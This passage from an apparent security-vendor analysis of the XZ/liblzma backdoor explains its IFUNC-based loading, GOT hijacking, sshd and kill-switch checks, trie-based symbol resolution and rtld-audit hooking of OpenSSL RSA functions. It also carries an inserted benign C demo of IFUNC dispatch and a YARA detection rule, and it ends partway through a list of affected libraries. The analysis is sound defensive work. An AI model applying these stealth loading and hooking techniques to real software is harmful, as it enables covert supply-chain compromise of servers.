  2028. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112362" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-1024x531.png" alt="" width="1024" height="531" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-1024x531.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-300x156.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-768x398.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-1536x796.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-675x350.png 675w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-740x384.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-540x280.png 540w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-800x415.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14.png 1645w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  2029. <h2 id="binary-backdoor-analysis">Binary backdoor analysis</h2>
  2030. <h3 id="a-stealth-loading-scenario">A stealth loading scenario</h3>
  2031. <p>In the original XZ code, there are two special functions used to calculate the CRC of the given data: <strong>lzma_crc32 </strong>and <strong>lzma_crc64</strong>. Both of these functions are stored in the ELF symbol table with type <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC" target="_blank" rel="noopener">IFUNC</a>, a feature provided by the GNU C Library (GLIBC). IFUNC allows developers to dynamically select the correct function to use. This selection takes place when the dynamic linker loads the shared library.</p>
2032. <p>The reason XZ uses this is that it allows for determining whether an optimized version of the <strong>lzma_crcX </strong>function should be used or not. The optimized version requires special features from modern processors (CLMUL, SSSE3, SSE4.1). These special features need to be verified by issuing the <strong>cpuid </strong>instruction, which is called using the <a href="https://github.com/gcc-mirror/gcc/blob/6f9ba3ea55477cf1bd3d37e40ad116150c06a75e/gcc/config/i386/cpuid.h#L324" target="_blank" rel="noopener"><strong>__get_cpuid</strong></a> wrapper/intrinsic provided by GLIBC, and it is at this point that the backdoor takes advantage of the call to load itself.</p>
  2033. <p>The backdoor is stored as an object file, and its primary goal is to be linked to the main executable during compilation. The object file contains the <strong>_get_cpuid</strong> symbol, as the injected shell scripts remove one underscore symbol from the original source code, which means that when the code calls <strong>_get_cpuid</strong>, it actually calls the backdoor&#8217;s version of it.</p>
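<p>The following is an added example, not code from the article or from the XZ project: a minimal GNU IFUNC dispatcher in the style liblzma uses for <strong>lzma_crc64</strong>, showing why a resolver that calls the <strong>__get_cpuid</strong> wrapper at load time is such an attractive place to substitute a symbol. All function names other than <strong>__get_cpuid</strong> are made up for the example.</p>

```c
/* Added example (not from the Securelist article or the XZ project): a GNU IFUNC
 * setup modelled on liblzma's CRC dispatch. The resolver runs once, when the
 * dynamic linker processes the object's relocations (before main), queries
 * CPUID through the __get_cpuid wrapper from cpuid.h and picks an
 * implementation. A symbol with the wrapper's name linked in its place would
 * therefore receive control before any application code runs. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <cpuid.h>   /* __get_cpuid(): the wrapper discussed in the article */

/* CPUID.1:ECX feature bits the clmul path depends on (Intel SDM bit positions). */
#define FEAT_PCLMULQDQ (1u << 1)
#define FEAT_SSSE3     (1u << 9)
#define FEAT_SSE4_1    (1u << 19)

/* Records the resolver's decision: -1 = resolver not run, 0 = generic, 1 = clmul. */
int crc64_chosen_impl = -1;

typedef uint64_t (*crc64_fn)(const uint8_t *buf, size_t len, uint64_t crc);

/* Bitwise CRC-64 with the reflected ECMA-182 polynomial (the .xz variant).
 * `crc` is the value returned by a previous call, so buffers can be chained. */
uint64_t crc64_generic(const uint8_t *buf, size_t len, uint64_t crc)
{
    crc = ~crc;
    for (size_t i = 0; i < len; i++) {
        crc ^= buf[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc >> 1) ^ (0xC96C5795D7870F42ULL & (0 - (crc & 1)));
    }
    return ~crc;
}

/* Stand-in for the PCLMULQDQ-accelerated path; it reuses the generic routine
 * so the example carries no intrinsics dependency (hypothetical function). */
uint64_t crc64_clmul(const uint8_t *buf, size_t len, uint64_t crc)
{
    return crc64_generic(buf, len, crc);
}

/* Mirrors the spirit of is_arch_extension_supported(): read CPUID leaf 1 and
 * require every extension the fast path needs. This is the call site whose
 * symbol name the injected script rewrites from __get_cpuid to _get_cpuid. */
int arch_supports_clmul(void)
{
    unsigned eax = 0, ebx = 0, ecx = 0, edx = 0;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return 0;                               /* leaf 1 unavailable */
    unsigned need = FEAT_PCLMULQDQ | FEAT_SSSE3 | FEAT_SSE4_1;
    return (ecx & need) == need;
}

/* IFUNC resolver: invoked by the loader, not by application code. */
static crc64_fn resolve_crc64(void)
{
    crc64_chosen_impl = arch_supports_clmul() ? 1 : 0;
    return crc64_chosen_impl ? crc64_clmul : crc64_generic;
}

/* The exported symbol gets type STT_GNU_IFUNC; callers jump through the
 * resolver-chosen pointer and never learn which variant they received. */
uint64_t lzma_crc64_demo(const uint8_t *buf, size_t len, uint64_t crc)
    __attribute__((ifunc("resolve_crc64")));

int main(void)
{
    /* Constructed sample input: the standard CRC check string. */
    const uint8_t sample[] = "123456789";
    uint64_t crc = lzma_crc64_demo(sample, 9, 0);
    printf("resolver chose impl %d, crc64(\"123456789\") = 0x%016llx\n",
           crc64_chosen_impl, (unsigned long long)crc);
    return 0;
}
```

Inspecting the built object with <strong>readelf -s</strong> shows <strong>lzma_crc64_demo</strong> with type <strong>IFUNC</strong>, which is the property the article's stage 3 script checks for before injecting the object file.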
  2034. <div id="attachment_112363" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112363" class="size-large wp-image-112363" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-1024x392.png" alt="Backdoor code entry point" width="1024" height="392" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-1024x392.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-300x115.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-768x294.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-915x350.png 915w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-740x283.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-732x280.png 732w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-800x306.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07.png 1302w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112363" class="wp-caption-text">Backdoor code entry point</p></div>
  2035. <h3 id="backdoor-code-analysis">Backdoor code analysis</h3>
2036. <p>The initial backdoor code is invoked twice, as both <strong>lzma_crc32</strong> and <strong>lzma_crc64</strong> use the same modified function (<strong>_get_cpuid</strong>). To ensure control over this, a simple counter is created to verify that the code has already been executed. The actual malicious activity starts when the <strong>lzma_crc64</strong> IFUNC invokes <strong>_get_cpuid</strong>, sees the counter value 1 indicating that the function has already been accessed, and initiates one final step to redirect to the true entry point of this malware.</p>
  2037. <div id="attachment_112364" style="width: 864px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112364" class="size-large wp-image-112364" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-854x1024.png" alt="Backdoor initialization" width="854" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-854x1024.png 854w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-250x300.png 250w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-768x921.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-168x200.png 168w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-292x350.png 292w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-740x887.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-233x280.png 233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-751x900.png 751w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01.png 964w" sizes="(max-width: 854px) 100vw, 854px" /></a><p id="caption-attachment-112364" class="wp-caption-text">Backdoor initialization</p></div>
  2038. <p>To initialize the malicious code, the backdoor first initializes a couple of structures that hold core information about the current running process. Primarily, it locates the Global Offset Table (<a href="https://en.wikipedia.org/wiki/Global_Offset_Table">GOT</a>) address using hardcoded offsets, and uses this information to find the <strong>cpuid</strong> pointer inside it.</p>
  2039. <div id="attachment_112365" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112365" class="size-large wp-image-112365" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-1024x381.png" alt="GOT modification code" width="1024" height="381" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-1024x381.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-300x112.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-768x286.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-1536x572.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-940x350.png 940w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-740x276.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-752x280.png 752w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-800x298.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03.png 1678w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112365" class="wp-caption-text">GOT modification code</p></div>
  2040. <p>The GOT contains the offsets of symbols, including the <strong>cpuid</strong> wrapper. The backdoor then swaps the pointers to the main malware function, and calls it as if it were calling <strong>cpuid</strong>.</p>
  2041. <h3 id="core-behavior">Core behavior</h3>
  2042. <p>The main goal of the backdoor is to successfully hook specific functions that will allow it to monitor every connection to the infected machine. The targeted functions include:</p>
  2043. <table width="100%">
  2044. <tbody>
  2045. <tr>
  2046. <td width="30%"><strong>Targeted function</strong></td>
  2047. <td width="70%"><strong>Description</strong></td>
  2048. </tr>
  2049. <tr>
  2050. <td><strong>RSA_public_decrypt</strong></td>
  2051. <td>Used by <strong>libcrypto</strong> to decrypt a ciphertext signed by a private key</td>
  2052. </tr>
  2053. <tr>
  2054. <td><strong>EVP_PKEY_set1_RSA</strong></td>
  2055. <td>Used by <strong>libcrypto</strong> to set the RSA key of a given context</td>
  2056. </tr>
  2057. <tr>
  2058. <td><strong>RSA_get0_key</strong></td>
  2059. <td>Used by <strong>libcrypto</strong> to retrieve an RSA key</td>
  2060. </tr>
  2061. </tbody>
  2062. </table>
  2063. <p>However, hooking all these functions is not a simple and straightforward task for the backdoor. It involves accessing many internal structures and manipulating process-specific structures until it achieves its goal, and it also needs to be as stealthy as possible, which means that the malicious code contains multiple checks to avoid being analyzed.</p>
  2064. <h3 id="execution-environment-check">Execution environment check</h3>
  2065. <p>It first parses <strong>ld-linux</strong> (dynamic linker), which is primarily responsible for dynamically resolving symbol addresses in memory. It also extracts various information about the environment and verifies that the current process the backdoor is running in matches its execution criteria, which are:</p>
  2066. <ul>
  2067. <li>The current process is <strong>/usr/bin/sshd</strong></li>
2068. <li>The kill switch is not present</li>
  2069. </ul>
  2070. <p>It extracts the name of the current process from <strong>argv[0]</strong> and also parses all the process environment variables to see if any of them are present in its internal string table. If a match is found, or the process is not <strong>sshd</strong>, the malware halts its execution.</p>
  2071. <div id="attachment_112366" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112366" class="size-large wp-image-112366" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-1024x864.png" alt="Process environment check" width="1024" height="864" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-1024x864.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-300x253.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-768x648.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-415x350.png 415w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-740x624.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-332x280.png 332w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-800x675.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15.png 1299w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112366" class="wp-caption-text">Process environment check</p></div>
  2072. <p>The only variable inside its own table is <strong>yolAbejyiejuvnup=Evjtgvsh5okmkAvj</strong>, which in this context serves as a <strong>kill switch</strong>.</p>
  2073. <h3 id="the-trie-structure">The trie structure</h3>
2074. <p>One of the distinctive features of the backdoor is the use of a single <a href="https://en.wikipedia.org/wiki/Trie" target="_blank" rel="noopener">trie</a> structure for string operations. Instead of directly comparing strings or using string hashes to match a particular constant (for example, the name of a library function), the code performs a trie lookup, and checks if the result is equal to a certain constant number. For example, the magic value for the ELF header results in the trie returning <strong>0x300</strong>, and the name of the <strong>system</strong> function is matched with a return value of <strong>0x9F8</strong>. The trie is not just used for comparisons: certain functions that use pointers to strings (for example, <strong>ssh-2.0</strong>) search for these strings in the host binary using the trie, so there will be no suspicious data in the backdoor&#8217;s body.</p>
  2075. <p>The implementation of the trie uses 16-byte bitmasks, each half corresponding to the byte input ranges <strong>0x00-0x3F</strong> and <strong>0x40-0x7F</strong>, and 2-byte trie leaf nodes, 3 bits of which are flags (direction, termination) and the rest is reserved for the value (or the location of the next node).</p>
  2076. <div id="attachment_112367" style="width: 658px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112367" class="size-full wp-image-112367" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16.png" alt="Part of the trie lookup function that performs the bitmap match" width="648" height="275" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16-300x127.png 300w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112367" class="wp-caption-text">Part of the trie lookup function that performs the bitmap match</p></div>
  2077. <h3 id="symbol-resolver">Symbol resolver</h3>
  2078. <p>There are at least three symbol resolver-related routines used by the backdoor to locate the ELF Symbol structure, which holds information such as the symbol name and its offset. All symbol resolver functions receive a key to be searched in the trie.</p>
  2079. <div id="attachment_112368" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112368" class="size-large wp-image-112368" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-1024x195.png" alt="Symbol resolver example" width="1024" height="195" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-1024x195.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-300x57.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-768x146.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-740x141.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-800x153.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05.png 1028w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112368" class="wp-caption-text">Symbol resolver example</p></div>
  2080. <p>One of the backdoor resolver functions iterates through all symbols and verifies which one has the desired key. If it is found, it returns the <strong>Elf64_Sym</strong> structure, which will later be used to populate an internal structure of the backdoor that holds all the necessary function pointers. This process is similar to that commonly seen in Windows threats with API hashing routines.</p>
  2081. <p>The backdoor searches many functions from the libcrypto (OpenSSL) library, as these will be used in later encryption routines. It also keeps track of how many functions it was able to find and resolve; this determines whether it is executing properly or should stop.</p>
  2082. <p>Another interesting symbol resolver abuses the <strong>lzma_alloc</strong> function, which is part of the liblzma library itself. This function serves as a helper for developers to allocate memory efficiently using the default allocator (malloc) or a custom one. In the case of the XZ backdoor, this function is abused to make use of a fake allocator. In reality, it functions as another symbol resolver. The parameter intended for &#8220;allocation size&#8221; is, in fact, the symbol key inside the trie. This trick is meant to complicate backdoor analysis.</p>
  2083. <div id="attachment_112369" style="width: 1007px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112369" class="size-full wp-image-112369" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06.png" alt="Symbol resolver using a fake allocator structure" width="997" height="98" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06.png 997w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-300x29.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-768x75.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-990x98.png 990w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-740x73.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-800x79.png 800w" sizes="(max-width: 997px) 100vw, 997px" /></a><p id="caption-attachment-112369" class="wp-caption-text">Symbol resolver using a fake allocator structure</p></div>
  2084. <p>The backdoor dynamically resolves its symbols while executing; it doesn&#8217;t necessarily do so all at once or only when it needs to use them. The resolved symbols/functions range from legitimate OpenSSL functions to functions such as <strong>system</strong>, which is used to execute commands on the machine.</p>
  2085. <h3 id="the-symbind-hook">The Symbind hook</h3>
2086. <p>As mentioned earlier, the primary objective of the backdoor initialization is to successfully hook functions. To do so, the backdoor makes use of <a href="https://www.man7.org/linux/man-pages/man7/rtld-audit.7.html" target="_blank" rel="noopener"><strong>rtld-audit</strong></a>, a feature of the dynamic linker that enables the creation of custom shared libraries to be notified when certain events occur within the linker, such as symbol resolution. In a typical scenario, a developer would create a shared library following the <a href="https://www.man7.org/linux/man-pages/man7/rtld-audit.7.html" target="_blank" rel="noopener"><strong>rtld-audit</strong> manual</a>. However, the XZ backdoor opts to perform a runtime patch on the already registered (default) interfaces loaded in memory, thereby hijacking the symbol-resolving routine.</p>
  2087. <div id="attachment_112370" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112370" class="size-large wp-image-112370" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-1024x194.png" alt="dl-audit runtime patch" width="1024" height="194" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-1024x194.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-300x57.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-768x146.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-740x141.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-800x152.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11.png 1385w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112370" class="wp-caption-text">dl-audit runtime patch</p></div>
  2088. <p>The maliciously crafted structure <a href="https://elixir.bootlin.com/glibc/latest/source/sysdeps/generic/ldsodefs.h#L237" target="_blank" rel="noopener"><strong>audit_iface</strong></a>, stored in the <strong>dl_audit</strong> global variable within the dynamic linker&#8217;s memory area, contains the <strong>symbind64</strong> callback address, which is invoked by the dynamic linker. It sends all the symbol information to the backdoor control, which is then used to obtain a malicious address for the target functions, thus achieving hooking.</p>
  2089. <div id="attachment_112371" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112371" class="size-large wp-image-112371" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-1024x308.png" alt="Hooking placement inside the Symbind modified callback" width="1024" height="308" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-1024x308.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-300x90.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-768x231.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-740x222.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-932x280.png 932w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-800x240.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08.png 1085w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112371" class="wp-caption-text">Hooking placement inside the Symbind modified callback</p></div>
  2090. <p>The addresses of <strong>dl_audit</strong> and <strong>dl_naudit</strong> (the latter holds the number of audit interfaces available) are obtained by disassembling both the <strong>dl_main</strong> and <strong>dl_audit_symbind_alt</strong> functions. The backdoor contains an internal minimalistic <strong>disassembler</strong> used for instruction decoding, and makes extensive use of it, especially when hunting for specific values like the <strong>*audit</strong> addresses.</p>
  2091. <div id="attachment_112372" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112372" class="size-large wp-image-112372" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-1024x492.png" alt="dl_naudit hunting code" width="1024" height="492" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-1024x492.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-300x144.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-768x369.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-728x350.png 728w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-740x356.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-582x280.png 582w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-800x385.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02.png 1504w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112372" class="wp-caption-text">dl_naudit hunting code</p></div>
  2092. <p>The <strong>dl_naudit</strong> address is found via one of the <strong>mov</strong> instructions in the <strong>dl_main</strong> function code that accesses it: the backdoor scans the function for such an access to a memory address and saves that address.</p>
  2093. <p>It then verifies that the acquired address is the same one accessed by the <strong>dl_audit_symbind_alt</strong> function at a given offset, which allows it to safely assume that it has indeed found the correct address. Once it has the <strong>dl_naudit</strong> address, it can easily calculate where <strong>dl_audit</strong> is, since the two are stored next to each other in memory.</p>
  2094. <h2 id="conclusion">Conclusion</h2>
  2095. <p>In this article, we covered the entire process of backdooring <strong>liblzma (XZ)</strong>, and delved into a detailed analysis of the binary backdoor code, up to achieving its principal goal: hooking.</p>
  2096. <p>It&#8217;s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the <strong>XZ</strong> repository, as well as the complex code contained within the binary itself.</p>
  2097. <p>There is still much more to explore about the backdoor&#8217;s internals, which is why we have decided to present this as <strong>Part I</strong> of the <strong>XZ</strong> backdoor series.</p>
  2098. <p>Kaspersky products detect malicious objects related to the attack as <strong>HEUR:Trojan.Script.XZ</strong> and <strong>Trojan.Shell.XZ</strong>. In addition, Kaspersky Endpoint Security for Linux detects malicious code in SSHD process memory as <strong>MEM:Trojan.Linux.XZ</strong> (as part of the Critical Areas Scan task).</p>
  2099. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  2100. <h3 id="yara-rules">Yara rules</h3>
  2101. <pre class="crayon-plain-tag">rule liblzma_get_cpuid_function {
  2102.     meta:
  2103.         description = "Rule to find the malicious get_cpuid function CVE-2024-3094"
  2104.         author = "Kaspersky Lab"
  2105.     strings:
  2106.         $a = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 4C 89 44 24 08 E8 ?? ?? ?? ?? 85 C0 74 27 39 D8 72 23 4C 8B 44 24 08 48 8B 4C 24 10 45 31 C9 48 89 EE 48 8B 54 24 18 89 DF E8 ?? ?? ?? ?? B8 01 00 00 00 EB 02 31 C0 48 83 C4 28 5B 5D C3 }
  2107.     condition:
  2108.         $a
  2109. }</pre>
  2110. <h3 id="known-backdoored-libraries">Known backdoored libraries</h3>
  2111. <p><strong>Debian Sid liblzma.so.5.6.0</strong><br />
